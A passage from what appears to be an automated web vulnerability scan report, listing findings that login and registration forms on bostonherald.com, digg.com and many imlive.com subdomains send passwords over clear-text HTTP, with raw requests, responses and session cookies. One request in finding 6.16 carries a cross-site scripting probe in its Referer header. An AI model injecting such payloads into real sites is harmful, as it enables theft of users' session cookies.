GET /track/inside_track/view.bg?articleid=1312557&format=comments&srvc=track&position=2 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.3. http://bostonherald.com/track/star_tracks/view.bg previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/star_tracks/view.bg

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/track/star_tracks/view.bg?articleid=1312549&format=comments&srvc=track&position=3

The form contains the following password fields:

password
confirm_password

Request

GET /track/star_tracks/view.bg?articleid=1312549&format=comments&srvc=track&position=3 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.4. http://bostonherald.com/users/login previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/users/login

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/users/login?returnto=/users/

The form contains the following password field:

password

Request

GET /users/login HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.5. http://bostonherald.com/users/register/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/users/register/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/users/register/

The form contains the following password fields:

password
confirm_password

Request

GET /users/register/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.6. http://br.imlive.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://br.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://br.imlive.com/members.aspx

The form contains the following password field:

txtPassword

Request

GET / HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=rzczlq3uuxqphzq12ovdaz45; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=rzczlq3uuxqphzq12ovdaz45; path=/; HttpOnly
Set-Cookie: spvdr=vd=646c9815-aa9c-4aef-98a9-a90044ab80e5&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:50 GMT; path=/
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:50 GMT
Connection: close
Content-Length: 18208
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">

<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.7. http://cafr.imlive.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cafr.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://cafr.imlive.com/members.aspx

The form contains the following password field:

txtPassword

Request

GET / HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=y3tfry450byj5jywotc4d055; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=y3tfry450byj5jywotc4d055; path=/; HttpOnly
Set-Cookie: spvdr=vd=afa07c32-e9d6-40f5-9fbf-41c391d891a9&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:53 GMT; path=/
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:52 GMT
Connection: close
Content-Length: 18731
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">

<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.8. http://de.imlive.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://de.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://de.imlive.com/members.aspx

The form contains the following password field:

txtPassword

Request

GET / HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=fhuicq55a4uitj55chpgdhek; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=fhuicq55a4uitj55chpgdhek; path=/; HttpOnly
Set-Cookie: spvdr=vd=02b46df6-422e-4d35-8928-ba18aa43474c&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:56 GMT; path=/
Set-Cookie: ide=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:56 GMT
Connection: close
Content-Length: 18297
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">

<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.9. http://digg.com/submit previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://digg.com/submit

The form contains the following password field:

password

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:25:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163912321857224960%3A171; expires=Sun, 30-Jan-2011 05:25:28 GMT; path=/; domain=digg.com
Set-Cookie: d=f148f02d29ba659b182b1c54e053268c0b2309202a4d0c9ea1fb51eef766d1ad; expires=Thu, 28-Jan-2021 15:33:08 GMT; path=/; domain=.digg.com
X-Digg-Time: D=27902 10.2.128.186
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7633

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

6.10. http://dk.imlive.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dk.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://dk.imlive.com/members.aspx

The form contains the following password field:

txtPassword

Request

GET / HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=nn1y4duqur04onbqzv5cab45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nn1y4duqur04onbqzv5cab45; path=/; HttpOnly
Set-Cookie: spvdr=vd=6b4ad7c2-4fe9-446c-bd92-1540c020264b&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:06 GMT; path=/
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:06 GMT
Connection: close
Content-Length: 17878
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">

<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.11. http://es.imlive.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://es.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://es.imlive.com/members.aspx

The form contains the following password field:

txtPassword

Request

GET / HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=vchlbzedqlcfhl45ve5fslub; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=vchlbzedqlcfhl45ve5fslub; path=/; HttpOnly
Set-Cookie: spvdr=vd=8e4ca1d5-377c-48cd-a6db-d82638510b03&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:08 GMT; path=/
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 18321
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">

<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.12. http://fr.imlive.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fr.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://fr.imlive.com/members.aspx

The form contains the following password field:

txtPassword

Request

GET / HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=biwlqs45r3p1b2nlyi4uyly4; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=biwlqs45r3p1b2nlyi4uyly4; path=/; HttpOnly
Set-Cookie: spvdr=vd=49cda1d5-e336-4ec8-bd41-d08c0704718a&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:18 GMT; path=/
Set-Cookie: ifr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:17 GMT
Connection: close
Content-Length: 18534
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-FR" lang="fr-FR" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">

<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.13. http://gr.imlive.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gr.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://gr.imlive.com/members.aspx

The form contains the following password field:

txtPassword

Request

GET / HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=qarha0jvy2pajv55jux4d3jl; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=qarha0jvy2pajv55jux4d3jl; path=/; HttpOnly
Set-Cookie: spvdr=vd=acc31a9c-64aa-4483-a09d-06f887e53a48&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:21 GMT; path=/
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:20 GMT
Connection: close
Content-Length: 20472
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">

<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.14. http://imlive.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://imlive.com/members.aspx

The form contains the following password field:

txtPassword

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0W5s89nS82L1Y30bT54fyWa09YbZxWHM4PkcHt5cVPiM; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:16 GMT
Connection: close
Content-Length: 18944
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">

<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.15. http://imlive.com/homepagems3.asp previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/homepagems3.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://imlive.com/homepagems3.asp?

The form contains the following password field:

header_password

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 13:59:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
Set-Cookie: ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 13:59:08 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 10201

<html>
   <head>

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/hostbasic.c
...[SNIP]...
<td align=right>
   <form onsubmit="return CheckForm(this);" method="post" action="homepagems3.asp?" style="margin:0;" name="frmLogin" ID="frmLogin"><input type="hidden" name="func" id="func" value="log">
...[SNIP]...
<div style="display:inline;" id="PwdParent"><input type="password" name="header_password" id="header_password" class="inputhead"></div>
...[SNIP]...

6.16. http://imlive.com/webcam-login/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/webcam-login/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://imlive.com/webcam-login/

The form contains the following password field:

txtPassword

Request

GET /webcam-login/ HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Referer: http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; BIGipServerImlive=2417231426.20480.0000; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; __utmb=71081352.4.10.1296223202

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:06:25 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 21541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<div class="LoginPart minH">
<form onsubmit="return IsValidLogin(this)" method="post" name="frm">
<span id="ctl00_BodyContentPlaceHolder_lWelcome" class="loginWelcome">
...[SNIP]...
</label>
<input type="password" id="txtPassword" name="txtPassword" tabindex="2" />
<input type="submit" value="Submit" tabindex="4" />
...[SNIP]...

6.17. http://in.imlive.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://in.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://in.imlive.com/members.aspx

The form contains the following password field:

txtPassword

Request

GET / HTTP/1.1
Host: in.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=xgztykig5g3mkg55rbuiufv2; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=xgztykig5g3mkg55rbuiufv2; path=/; HttpOnly
Set-Cookie: spvdr=vd=4fbca91b-ec62-43d7-a59a-b2e914467e3f&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:35 GMT; path=/
Set-Cookie: iin=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:24:35 GMT
Connection: close
Content-Length: 20907
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="hi-IN" lang="hi-IN" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">

<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.18. http://it.imlive.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://it.imlive.com/members.aspx

The form contains the following password field:

txtPassword

Request

GET / HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=yioqjz3reg4ourimvrkbrbrd; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=yioqjz3reg4ourimvrkbrbrd; path=/; HttpOnly
Set-Cookie: spvdr=vd=d3cc5bc2-bab2-416e-acff-891f674e66d4&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:49 GMT; path=/
Set-Cookie: iit=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:24:49 GMT
Connection: close
Content-Length: 18113
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it-IT" lang="it-IT" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">

<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.19. http://jp.imlive.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jp.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://jp.imlive.com/members.aspx

The form contains the following password field:

txtPassword

Request

GET / HTTP/1.1
Host: jp.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=rgsy1a453yb3np55fmwslhyw; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=rgsy1a453yb3np55fmwslhyw; path=/; HttpOnly
Set-Cookie: spvdr=vd=eb9d52f6-9629-4754-bdff-f15e37967440&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:02 GMT; path=/
Set-Cookie: ijp=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:02 GMT
Connection: close
Content-Length: 19088
